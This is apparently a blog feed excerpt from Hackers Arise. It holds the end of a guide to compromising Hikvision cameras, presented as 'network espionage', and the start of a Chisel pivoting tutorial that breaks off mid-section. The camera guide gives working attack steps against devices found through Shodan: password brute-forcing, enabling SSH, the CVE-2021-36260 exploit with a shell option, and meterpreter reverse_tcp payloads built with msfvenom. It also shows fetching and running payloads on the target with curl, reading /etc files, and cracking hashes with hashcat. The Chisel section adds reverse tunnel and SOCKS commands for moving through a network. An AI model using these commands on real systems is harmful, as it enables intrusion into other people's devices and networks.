<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="451" src="https://hackers-arise.com/wp-content/uploads/2025/06/2-shodan-hikvision-results-1024x451.webp" alt="" class="wp-image-15742" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/2-shodan-hikvision-results-1024x451.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/06/2-shodan-hikvision-results-300x132.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/06/2-shodan-hikvision-results-768x338.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/06/2-shodan-hikvision-results.webp 1345w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
<p></p>
<p>If you brute-force a password and get into the web interface, go to the settings and enable SSH. This setting is often available on Hikvision cameras and sometimes on other brands.</p>
<p></p>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="923" height="401" src="https://hackers-arise.com/wp-content/uploads/2025/06/3-hikvision-settings-enabling-ssh.webp" alt="" class="wp-image-15743" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/3-hikvision-settings-enabling-ssh.webp 923w, https://hackers-arise.com/wp-content/uploads/2025/06/3-hikvision-settings-enabling-ssh-300x130.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/06/3-hikvision-settings-enabling-ssh-768x334.webp 768w" sizes="(max-width: 923px) 100vw, 923px" /></figure>
<p></p>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="540" height="195" src="https://hackers-arise.com/wp-content/uploads/2025/06/4-hikvision-camera-ssh-enabled.webp" alt="" class="wp-image-15744" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/4-hikvision-camera-ssh-enabled.webp 540w, https://hackers-arise.com/wp-content/uploads/2025/06/4-hikvision-camera-ssh-enabled-300x108.webp 300w" sizes="(max-width: 540px) 100vw, 540px" /></figure>
<p></p>
<p>Once SSH is on, set up an SSH tunnel to route your traffic through the camera with the same credentials:</p>
<p><strong>kali > ssh -D 9050 -4 admin@<camera_ip></strong></p>
<p></p>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="752" height="137" src="https://hackers-arise.com/wp-content/uploads/2025/06/5-hikvision-camera-ssh-tunneling.webp" alt="" class="wp-image-15745" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/5-hikvision-camera-ssh-tunneling.webp 752w, https://hackers-arise.com/wp-content/uploads/2025/06/5-hikvision-camera-ssh-tunneling-300x55.webp 300w" sizes="(max-width: 752px) 100vw, 752px" /></figure>
<p></p>
<p>If the credentials work, you’re in. Sometimes the SSH port expects a different set of credentials. Remember, the SSH setting might be disabled automatically after a while, so you’ll need to re-enable it via the dashboard.</p>
<p>Now configure proxychains:</p>
<p><strong>kali > sudo nano /etc/proxychains4.conf</strong></p>
<p></p>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="452" height="143" src="https://hackers-arise.com/wp-content/uploads/2025/06/6-proxychains4-config-editing.webp" alt="" class="wp-image-15746" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/6-proxychains4-config-editing.webp 452w, https://hackers-arise.com/wp-content/uploads/2025/06/6-proxychains4-config-editing-300x95.webp 300w" sizes="(max-width: 452px) 100vw, 452px" /></figure>
<p></p>
<p>Make sure the port (9050) matches what you used in the SSH tunnel. With this setup, you can begin scanning the internal network. Most cameras aren’t segmented from other devices, so once you’re inside, you can talk to almost anything. Let’s do a basic network scan through the camera. Note that in the example below I used a different port:</p>
<p><strong>kali > proxychains4 nmap 192.168.1.0/24 -Pn</strong></p>
<p></p>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="863" height="362" src="https://hackers-arise.com/wp-content/uploads/2025/06/7-actively-tunneling-traffic-through-the-camera.webp" alt="" class="wp-image-15747" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/7-actively-tunneling-traffic-through-the-camera.webp 863w, https://hackers-arise.com/wp-content/uploads/2025/06/7-actively-tunneling-traffic-through-the-camera-300x126.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/06/7-actively-tunneling-traffic-through-the-camera-768x322.webp 768w" sizes="(max-width: 863px) 100vw, 863px" /></figure>
<p></p>
<p>If <strong>nmap</strong> isn’t available, use <strong>nc</strong>:</p>
<p><strong>kali > proxychains4 nc -zv 192.168.1.15 445</strong></p>
<p>For easier subnet scanning, you can automate this with a simple bash loop. It’s important to know how to scan hosts with <strong>nc</strong>, because your target might not have all the necessary tools installed.</p>
<h2 class="wp-block-heading"><a></a><strong>Case 2: CVE-2021-36260</strong></h2>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="926" height="284" src="https://hackers-arise.com/wp-content/uploads/2025/06/8-hikvision-cve-on-github.webp" alt="" class="wp-image-15748" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/8-hikvision-cve-on-github.webp 926w, https://hackers-arise.com/wp-content/uploads/2025/06/8-hikvision-cve-on-github-300x92.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/06/8-hikvision-cve-on-github-768x236.webp 768w" sizes="(max-width: 926px) 100vw, 926px" /></figure>
<p></p>
<p>This Hikvision vulnerability is still unpatched on many systems. If you find a target with this flaw, run the exploit like this:</p>
<p><strong>kali > git clone https://github.com/Aiminsun/CVE-2021-36260</strong></p>
<p><strong>kali > cd CVE-2021-36260</strong></p>
<p><strong>kali > python3 CVE-2021-36260.py --rport <camera_port> --rhost <camera_ip> --shell</strong></p>
<p></p>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="714" height="338" src="https://hackers-arise.com/wp-content/uploads/2025/06/9-hikvision-shell-exploted-by-the-cve.webp" alt="" class="wp-image-15749" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/9-hikvision-shell-exploted-by-the-cve.webp 714w, https://hackers-arise.com/wp-content/uploads/2025/06/9-hikvision-shell-exploted-by-the-cve-300x142.webp 300w" sizes="(max-width: 714px) 100vw, 714px" /></figure>
<p></p>
<p>Once you have a shell, you will need a payload to turn the camera into a network proxy. Let’s see how to generate the right payload based on the device’s architecture.</p>
<h3 class="wp-block-heading"><strong>Architecture</strong></h3>
<p>First you want to determine the architecture of the target:</p>
<p><strong>target > uname -m</strong></p>
<p>Common outputs and what they mean:</p>
<p><strong>x86 </strong>or<strong> i686</strong>: 32-bit Intel<br><strong>x86_64</strong>: 64-bit Intel<br><strong>armv7l</strong>: ARM<br><strong>mips, mipsel</strong>: MIPS variants</p>
<h3 class="wp-block-heading"><a></a><strong>Payload Generation</strong></h3>
<p>For 32-bit Intel:</p>
<p><strong>kali > msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<kali_ip> LPORT=<kali_port> -f elf > shell.elf</strong></p>
<p></p>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="963" height="147" src="https://hackers-arise.com/wp-content/uploads/2025/06/10-x86-metepreter.webp" alt="" class="wp-image-15750" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/10-x86-metepreter.webp 963w, https://hackers-arise.com/wp-content/uploads/2025/06/10-x86-metepreter-300x46.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/06/10-x86-metepreter-768x117.webp 768w" sizes="(max-width: 963px) 100vw, 963px" /></figure>
<p></p>
<p>For 64-bit Intel:</p>
<p><strong>kali > msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<kali_ip> LPORT=<kali_port> -f elf > shell.elf</strong></p>
<p></p>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="965" height="139" src="https://hackers-arise.com/wp-content/uploads/2025/06/11-x64-meterpreter.webp" alt="" class="wp-image-15751" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/11-x64-meterpreter.webp 965w, https://hackers-arise.com/wp-content/uploads/2025/06/11-x64-meterpreter-300x43.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/06/11-x64-meterpreter-768x111.webp 768w" sizes="(max-width: 965px) 100vw, 965px" /></figure>
<p></p>
<p>For ARM:</p>
<p><strong>kali > msfvenom -p linux/armle/meterpreter/reverse_tcp LHOST=<kali_ip> LPORT=<kali_port> -f elf > shell.elf</strong></p>
<p></p>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="987" height="132" src="https://hackers-arise.com/wp-content/uploads/2025/06/12-armle-meterpreter.webp" alt="" class="wp-image-15752" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/12-armle-meterpreter.webp 987w, https://hackers-arise.com/wp-content/uploads/2025/06/12-armle-meterpreter-300x40.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/06/12-armle-meterpreter-768x103.webp 768w" sizes="(max-width: 987px) 100vw, 987px" /></figure>
<p></p>
<p>For MIPS:</p>
<p><strong>kali > msfvenom -p linux/mipsle/meterpreter/reverse_tcp LHOST=<kali_ip> LPORT=<kali_port> -f elf > shell.elf</strong></p>
<p></p>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="987" height="134" src="https://hackers-arise.com/wp-content/uploads/2025/06/13-misple-meterpreter.webp" alt="" class="wp-image-15753" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/13-misple-meterpreter.webp 987w, https://hackers-arise.com/wp-content/uploads/2025/06/13-misple-meterpreter-300x41.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/06/13-misple-meterpreter-768x104.webp 768w" sizes="(max-width: 987px) 100vw, 987px" /></figure>
<p></p>
<p>Once generated, upload and run the payload.</p>
<h3 class="wp-block-heading"><a></a><strong>File Upload</strong></h3>
<p>Simply use <strong>curl </strong>while hosting a payload on an HTTP server. First go to the directory where the payload was generated and then set up an HTTP server:</p>
<p><strong>kali > cd payload</strong></p>
<p><strong>kali > python3 -m http.server</strong></p>
<p><strong>target > curl -O </strong><a href="http://kali_ip:8000/shell.elf"><strong>http://kali_ip:8000/shell.elf</strong></a></p>
<p><strong>target > chmod +x shell.elf</strong></p>
<p><strong>target > ./shell.elf</strong></p>
<p>If you have an SSH port open, you can use this:</p>
<p><strong>kali > scp shell.elf admin@<camera_ip>:/tmp/shell.elf</strong></p>
<p><strong>target > cd /tmp</strong></p>
<p><strong>target > chmod +x shell.elf</strong></p>
<p><strong>target > ./shell.elf</strong></p>
<h3 class="wp-block-heading"><a></a><strong>Listener</strong></h3>
<p>On your machine, set up a handler with the same payload to receive the connection.</p>
<p></p>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="638" height="139" src="https://hackers-arise.com/wp-content/uploads/2025/06/14-setting-up-a-listener.webp" alt="" class="wp-image-15754" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/14-setting-up-a-listener.webp 638w, https://hackers-arise.com/wp-content/uploads/2025/06/14-setting-up-a-listener-300x65.webp 300w" sizes="(max-width: 638px) 100vw, 638px" /></figure>
<p></p>
<h3 class="wp-block-heading"><strong>Meterpreter Proxy</strong></h3>
<p>Once we get a Meterpreter session back, we need to set up routing. Routing in Metasploit defines which hosts are reachable through a session:</p>
<p><strong>Meterpreter > run autoroute -s 192.168.1.0/24</strong></p>
<p><strong>Meterpreter > background</strong></p>
<p><strong>msf6 > use auxiliary/server/socks_proxy</strong></p>
<p><strong>msf6 > run -j</strong></p>
<p></p>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="825" height="173" src="https://hackers-arise.com/wp-content/uploads/2025/06/15-meterpreter-proxy-settings.webp" alt="" class="wp-image-15755" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/15-meterpreter-proxy-settings.webp 825w, https://hackers-arise.com/wp-content/uploads/2025/06/15-meterpreter-proxy-settings-300x63.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/06/15-meterpreter-proxy-settings-768x161.webp 768w" sizes="(max-width: 825px) 100vw, 825px" /></figure>
<p></p>
<p>Here is how the module should be configured. If needed, update your <strong>proxychains4.conf</strong> to point to your proxy (9050), and now you can scan and move within the internal network as needed, just like in the first case.</p>
<h2 class="wp-block-heading"><a></a><strong>Bonus: Cracking Hashes</strong></h2>
<p>There is yet another way to get into Hikvision cameras. In some cases, the firewall blocks your attempt to land a shell using the <strong>--shell</strong> option of the CVE-2021-36260 exploit. When that happens, you can fall back on brute-forcing the password hash from the admin panel.</p>
<p></p>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="421" height="188" src="https://hackers-arise.com/wp-content/uploads/2025/06/16-list-of-vulnerable-hosts.webp" alt="" class="wp-image-15756" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/16-list-of-vulnerable-hosts.webp 421w, https://hackers-arise.com/wp-content/uploads/2025/06/16-list-of-vulnerable-hosts-300x134.webp 300w" sizes="(max-width: 421px) 100vw, 421px" /></figure>
<p></p>
<p>Start by using the command below to try to extract the contents of the <strong>/etc/</strong> directory:</p>
<p><strong>python3 CVE-2021-36260.py --rhost <camera_ip> --rport <camera_port> --cmd "cat /etc/*"</strong></p>
<p></p>
<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="498" src="https://hackers-arise.com/wp-content/uploads/2025/06/17-camera-remote-code-execution-1024x498.webp" alt="" class="wp-image-15757" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/17-camera-remote-code-execution-1024x498.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/06/17-camera-remote-code-execution-300x146.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/06/17-camera-remote-code-execution-768x373.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/06/17-camera-remote-code-execution.webp 1171w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
<p></p>
<p>The exploit doesn’t allow for complex commands, so you need to be efficient. You won’t be able to split the payload like we will be doing in Part 2. Instead, you want to quickly locate the file that holds the hashes.</p>
<p></p>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="524" height="112" src="https://hackers-arise.com/wp-content/uploads/2025/06/18-passwd-file.webp" alt="" class="wp-image-15758" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/18-passwd-file.webp 524w, https://hackers-arise.com/wp-content/uploads/2025/06/18-passwd-file-300x64.webp 300w" sizes="(max-width: 524px) 100vw, 524px" /></figure>
<p></p>
<p>Once you have the hash copied, move to cracking it. Hikvision has a built-in requirement for all passwords to be at least 8 characters long. So, before starting <strong>hashcat</strong>, filter your wordlist:</p>
<p><strong>awk 'length($0) >= 8' rockyou.txt > wordlist.txt</strong></p>
<p>This will save time and skip unnecessary short entries. Cracking the hash is resource-intensive and may take a while depending on your hardware and the complexity of the password. Run <strong>hashcat</strong> using mode <strong>500</strong> (MD5 crypt) as shown below:</p>
<p><strong>hashcat -m 500 hash.txt wordlist.txt</strong></p>
<p></p>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="639" height="153" src="https://hackers-arise.com/wp-content/uploads/2025/06/19-running-hashcat.webp" alt="" class="wp-image-15759" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/19-running-hashcat.webp 639w, https://hackers-arise.com/wp-content/uploads/2025/06/19-running-hashcat-300x72.webp 300w" sizes="(max-width: 639px) 100vw, 639px" /></figure>
<p></p>
<p>Let it run and monitor for a successful recovery. With persistence and a strong enough dictionary, you’ll eventually crack the password. Once done, use it to log in via the web interface or, if you later enable it, SSH. This method is slower than the others but effective when shell payloads fail. Keep it in your toolkit for when other vectors are closed.</p>
<h2 class="wp-block-heading"><a></a><strong>Conclusion</strong></h2>
<p>As shown, some cameras are easy to turn into a stepping stone. All you need is a working password, an unpatched vulnerability or a good wordlist. Since cameras are rarely segmented from the main network, once you’re in, you have potential access to everything. They make excellent proxies for network reconnaissance or further attacks.</p>
<p>In the following parts, we’ll cover firmware reverse engineering and modification. Things will get more advanced. Stay tuned.</p>
<p></p><p>The post <a href="https://hackers-arise.com/network-espionage-using-russian-cameras-as-proxy/">Network Espionage: Using Russian Cameras as Proxies to Hide Your Data</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.</p>]]></content:encoded>
<wfw:commentRss>https://hackers-arise.com/network-espionage-using-russian-cameras-as-proxy/feed/</wfw:commentRss>
<slash:comments>0</slash:comments>
</item>
<item>
<title>Pivoting within the Network: Getting Started with Chisel</title>
<link>https://hackers-arise.com/pivoting-within-the-network-getting-started-with-chisel/</link>
<comments>https://hackers-arise.com/pivoting-within-the-network-getting-started-with-chisel/#respond</comments>
<dc:creator><![CDATA[aircorridor]]></dc:creator>
<pubDate>Thu, 19 Jun 2025 16:49:11 +0000</pubDate>
<category><![CDATA[Cyberwar]]></category>
<category><![CDATA[Cyberwarrior]]></category>
<category><![CDATA[Hacking]]></category>
<category><![CDATA[Network Exploitation]]></category>
<category><![CDATA[Pentesting]]></category>
<category><![CDATA[Scanner]]></category>
<category><![CDATA[Uncategorized]]></category>
<guid isPermaLink="false">https://hackers-arise.com/?p=15627</guid>
<description><![CDATA[<p>Welcome back, aspiring cyberwarriors! When performing a penetration test or cyberwar mission, you’re typically not targeting just one computer. Often, you’re targeting multiple systems and need to move across the network, pivoting to gain further access to the environment. However, pivoting can sometimes be challenging. In this article, I’d like to introduce you to a […]</p>
<p>The post <a href="https://hackers-arise.com/pivoting-within-the-network-getting-started-with-chisel/">Pivoting within the Network: Getting Started with Chisel</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.</p>]]></description>
<content:encoded><![CDATA[<p id="foo">Welcome back, aspiring cyberwarriors!</p>
<p id="2ge7d44563">When performing a penetration test or cyberwar mission, you’re typically not targeting just one computer. Often, you’re targeting multiple systems and need to move across the network, pivoting to gain further access to the environment. However, pivoting can sometimes be challenging. In this article, I’d like to introduce you to a tool that simplifies this process: Chisel.</p>
<p id="8arqs44565">In the initial stage of the attack, we can observe the following network:</p>
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="740" height="352" src="https://hackers-arise.com/wp-content/uploads/2025/06/chisel_network.avif" alt="" class="wp-image-15628" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/chisel_network.avif 740w, https://hackers-arise.com/wp-content/uploads/2025/06/chisel_network-300x143.jpg 300w" sizes="(max-width: 740px) 100vw, 740px" /></figure>
<p id="1vbz244599">Let’s perform a ping scan across the subnet 10.10.10.0/24 to identify live hosts:</p>
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="740" height="203" src="https://hackers-arise.com/wp-content/uploads/2025/06/chisel_hosts.avif" alt="" class="wp-image-15629" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/chisel_hosts.avif 740w, https://hackers-arise.com/wp-content/uploads/2025/06/chisel_hosts-300x82.jpg 300w" sizes="(max-width: 740px) 100vw, 740px" /></figure>
<p id="5iuaq44634">Below is a breakdown of the command and its output:</p>
<h2 class="wp-block-heading" id="ydj8444640"><strong>Command Explanation:</strong></h2>
<ul id="06nzx44642" class="wp-block-list">
<li><strong>nmap -sP 10.10.10.0/24 -n -T5</strong>
<ul class="wp-block-list">
<li><strong>-sP</strong>: This option tells Nmap to perform a ping scan, which checks if hosts are up without probing ports.</li>
<li><strong>10.10.10.0/24</strong>: Specifies the target subnet to scan, covering all IPs from 10.10.10.0 to 10.10.10.255.</li>
<li><strong>-n</strong>: Disables DNS resolution, speeding up the scan by skipping hostname lookups.</li>
<li><strong>-T5</strong>: Sets the timing template to 5 (the highest), making the scan as fast as possible. Be cautious, as this can be noisy and might trigger IDS/IPS alerts.</li>
</ul>
</li>
</ul>
<h2 class="wp-block-heading" id="2ydix44663"><strong>Output Interpretation:</strong></h2>
<ul id="ftd6c44665" class="wp-block-list">
<li>Nmap has detected two hosts as “up” in this subnet: <strong>10.10.10.1</strong> and <strong>10.10.10.2</strong>.</li>
<li>The reported latency times (0.00025s and 0.00026s) are extremely low, indicating a very fast response from these hosts.</li>
<li>The scan completed in <strong>2.13 seconds</strong>, checking all 256 IP addresses in the subnet.</li>
</ul>
<p id="ao3r744681">This type of scan is useful in pivoting scenarios for quickly identifying reachable hosts within a target subnet.</p>
<p id="53g5s44683">We can see that <strong>10.10.10.2</strong> is our target machine. Next, I’m going to log in via SSH and use our previously earned root privileges. For this demonstration, I will skip the exploitation phase and focus solely on the pivoting process.</p>
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="740" height="241" src="https://hackers-arise.com/wp-content/uploads/2025/06/chisel_login.avif" alt="" class="wp-image-15630" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/chisel_login.avif 740w, https://hackers-arise.com/wp-content/uploads/2025/06/chisel_login-300x98.jpg 300w" sizes="(max-width: 740px) 100vw, 740px" /></figure>
<p id="u4hch45254">Now that I have access, I will bring in the necessary tools.</p>
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="740" height="366" src="https://hackers-arise.com/wp-content/uploads/2025/06/chisel_take_the_tools.avif" alt="" class="wp-image-15631" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/chisel_take_the_tools.avif 740w, https://hackers-arise.com/wp-content/uploads/2025/06/chisel_take_the_tools-300x148.jpg 300w" sizes="(max-width: 740px) 100vw, 740px" /></figure>
<p id="e0cfl45471">As you can see, I have set up a Python server and copied the tools I need onto the ‘hacked’ machine. The tools we need are Nmap, Socat, and Chisel. It’s important to note that these are static binaries, so I can run them on the target machine without any dependencies.</p>
<p id="j2aby45503">Now, if we run hostname -I:</p>
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="350" height="137" src="https://hackers-arise.com/wp-content/uploads/2025/06/chisel_hostname.avif" alt="" class="wp-image-15632" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/chisel_hostname.avif 350w, https://hackers-arise.com/wp-content/uploads/2025/06/chisel_hostname-300x117.jpg 300w" sizes="(max-width: 350px) 100vw, 350px" /></figure>
<p id="aq5bg45768">We see two interfaces: the one we already know (our target) and a new one. What we want to do here is scan the entire range to see what we can find. First, let’s move our tools into a new directory called tools, then give the necessary permissions to make them executable.</p>
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="662" height="487" src="https://hackers-arise.com/wp-content/uploads/2025/06/chisel_prepare_tools.avif" alt="" class="wp-image-15633" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/chisel_prepare_tools.avif 662w, https://hackers-arise.com/wp-content/uploads/2025/06/chisel_prepare_tools-300x221.jpg 300w" sizes="(max-width: 662px) 100vw, 662px" /></figure>
<p id="xqvp046042">Now, I can use Nmap to scan the network.</p>
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="740" height="347" src="https://hackers-arise.com/wp-content/uploads/2025/06/chisel_scan_network.avif" alt="" class="wp-image-15634" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/chisel_scan_network.avif 740w, https://hackers-arise.com/wp-content/uploads/2025/06/chisel_scan_network-300x141.jpg 300w" sizes="(max-width: 740px) 100vw, 740px" /></figure>
<p id="40nnt46287">We’ve found a new target. However, if we try to reach that target from our Kali machine, it won’t be possible. We’ll need our set of tools to proceed.</p>
<p id="1p9b846323">First, we need to set up our Chisel server to do some tunneling, port forwarding and even configure a SOCKS proxy. This will allow us to gain better access to the internal network, all the way from our Kali attacker machine.</p>
<p id="34bbe46325">Chisel is a fast, cross-platform tool designed for creating secure TCP/UDP tunnels through HTTP, making it useful for pivoting and bypassing network restrictions during red teaming or penetration testing.</p>
<h2 class="wp-block-heading" id="q7rtt46327"><strong>Underground Recognition of Chisel</strong></h2>
<p id="s8h6q46329">While detailed attribution can be challenging, threat intelligence indicates that sophisticated threat groups have integrated Chisel into their operational toolkits. Advanced Persistent Threat (APT) groups, especially those operating in geopolitically sensitive regions, have been observed leveraging Chisel’s capabilities.</p>
<p id="kxm6o46331">Groups like APT29 (Cozy Bear), known for their sophisticated cyber espionage campaigns, have shown interest in tools of this kind. Similarly, financially motivated threat actors targeting critical infrastructure have recognized Chisel’s potential.</p>
<h2 class="wp-block-heading" id="woeqh46333"><strong>Technical Mechanics of Network Infiltration</strong></h2>
<p id="ek7ev46335">The true power of Chisel lies in its versatile tunneling capabilities. Unlike traditional tools that rely on predictable communication patterns, Chisel adds sophistication through its HTTP/SSH hybrid approach.</p>
<p id="phvzk46337">Consider a scenario, which I described previously, where a penetration tester has compromised an internal workstation. Traditional methods would require direct network access or complex VPN configurations. Chisel transforms this constraint into an opportunity. To establish a reverse tunnel, we need just two commands:</p>
<p id="trj0j47131"><strong>chisel server --reverse -p 9090</strong></p>
<p id="9e5zj46340"><strong>chisel client attacker_ip:9090 R:3389:target_internal_ip:3389</strong></p>
<p id="o6bvk46342">These two commands create an encrypted pathway.</p>
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="740" height="289" src="https://hackers-arise.com/wp-content/uploads/2025/06/chisel_pathway.avif" alt="" class="wp-image-15635" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/chisel_pathway.avif 740w, https://hackers-arise.com/wp-content/uploads/2025/06/chisel_pathway-300x117.jpg 300w" sizes="(max-width: 740px) 100vw, 740px" /></figure>
<h2 class="wp-block-heading" id="ci0zo47511"><strong>Explanation of the Command</strong></h2>
<ul id="ltl0n47559" class="wp-block-list">
<li>./chisel: Executes the Chisel binary from the current directory.</li>
<li>server: Configures Chisel to operate in server mode.</li>
<li>-p 9090: Specifies that Chisel will listen on port 9090.</li>
<li>--reverse: Enables reverse tunneling, allowing a Chisel client (running on the target machine) to initiate connections back to the server.</li>
</ul>
<h2 class="wp-block-heading" id="6zdqs47572"><strong>Purpose of This Setup</strong></h2>
<p id="dmua047574">This configuration sets up Chisel to accept reverse connections on port 9090. When a Chisel client connects to this server from a target machine inside a restricted network, it establishes a tunnel. This tunnel lets you access internal resources within the target network via the Chisel connection, effectively bypassing firewalls or other restrictions.</p>
<p id="yunt447576">Using Chisel in this manner is a common practice in pivoting scenarios, where navigating internal networks requires establishing accessible pathways back to your machine.</p>
<h2 class="wp-block-heading" id="agamq47578"><strong>Next Step</strong></h2>
<p id="xc1rx47580">Now, you need to set up the Chisel client on the target machine to establish the connection.</p>
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="740" height="317" src="https://hackers-arise.com/wp-content/uploads/2025/06/chisel_connection.avif" alt="" class="wp-image-15636" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/chisel_connection.avif 740w, https://hackers-arise.com/wp-content/uploads/2025/06/chisel_connection-300x129.jpg 300w" sizes="(max-width: 740px) 100vw, 740px" /></figure>
<h2 class="wp-block-heading" id="ti33s48715"><strong>Breakdown of the Command:</strong></h2>
<ul id="jwusw48831" class="wp-block-list">
<li>./chisel client<strong>:</strong>
<ul class="wp-block-list">
<li>This command starts Chisel in client mode, indicating that this instance of Chisel will establish a connection to a remote Chisel server.</li>
</ul>
</li>
<li>10.0.2.15:9090<strong>:</strong>
<ul class="wp-block-list">
<li>Specifies the IP address and port of the Chisel server the client should connect to.</li>
<li>In this case, the client is connecting to a server running at IP address 10.0.2.15 and listening on port 9090.</li>
</ul>
</li>
<li>R:socks<strong>:</strong>
<ul class="wp-block-list">
<li>This option sets up a reverse SOCKS proxy. The R prefix signals that the client is asking the server to open a reverse SOCKS5 proxy.</li>
<li>This configuration establishes a SOCKS listener on the server side; connections made to it are relayed through the client. As a result, all traffic entering the proxy on the server can be directed into the network reachable from the client.</li>
</ul>
</li>
</ul>
<h2 class="wp-block-heading" id="5d6ji48861"><strong>Output Interpretation:</strong></h2>
<p id="0nxvc48863">When the client attempts to connect to ws://10.0.2.15:9090, it is initiating a connection to the Chisel server running at IP address 10.0.2.15 on port 9090 over a WebSocket (ws://). The output also shows the fingerprint of the server’s key, which identifies the server during the connection handshake; note that the client only rejects a mismatching server if it was given the expected fingerprint to pin, otherwise the value is simply reported. Once the connection is established, the latency is reported as 293.212µs, indicating a very low-latency connection and confirming that the SOCKS proxy is now active and ready for use.</p>
<p id="0p26s48865">By setting up this reverse SOCKS proxy, all traffic from the server can be routed to internal resources accessible to the client. This setup facilitates tasks such as reconnaissance, exploitation, or data exfiltration within the network.</p>
<h2 class="wp-block-heading" id="xrvn548867"><strong>SOCKS5 Proxy:</strong></h2>
<p id="cli4q48869">SOCKS5 is a network proxy protocol that operates at the transport layer (Layer 4) and supports both TCP and UDP traffic. It routes packets between a client and a server via a proxy, acting as an intermediary that forwards the traffic to its destination. Applications configured to use a SOCKS5 proxy send all traffic through this intermediary, which then forwards the data to the target. SOCKS5 is commonly used to bypass network restrictions, mask the client’s IP address, and securely access internal networks. It also supports authentication, making it more secure than previous proxy protocols.</p>
<h2 class="wp-block-heading" id="3edeo48871"><strong>SOCKS Proxy in This Scenario:</strong></h2>
<p id="65rur48873">In this case, the reverse SOCKS proxy (R:socks) is established on the Chisel server. This means any traffic sent to that proxy can be routed through the compromised host to access internal systems that were previously unreachable. Tools such as web browsers or proxy-aware applications can be configured to use this SOCKS proxy to reach these internal resources.</p>
<h2 class="wp-block-heading" id="kgjgb48875"><strong>WebSocket:</strong></h2>
<p id="tz2fu48877">WebSocket is a communication protocol that allows for full-duplex communication channels over a single TCP connection. It enables both the client and server to send and receive messages simultaneously. After a WebSocket connection is established (beginning with an HTTP request and then upgrading to WebSocket), data can flow freely between the two parties.</p>
<h2 class="wp-block-heading" id="2yi0p48879"><strong>WebSocket in This Scenario:</strong></h2>
<p id="5051f48881">In this scenario, Chisel utilizes WebSocket connections (ws://) to establish communication between the client and server. This is beneficial in environments where HTTP traffic is allowed but other protocols or direct connections might be blocked by firewalls. The use of WebSockets ensures a reliable, real-time connection for forwarding and tunneling network traffic.</p>
<h2 class="wp-block-heading" id="1pyt848883"><strong>Objective in This Scenario:</strong></h2>
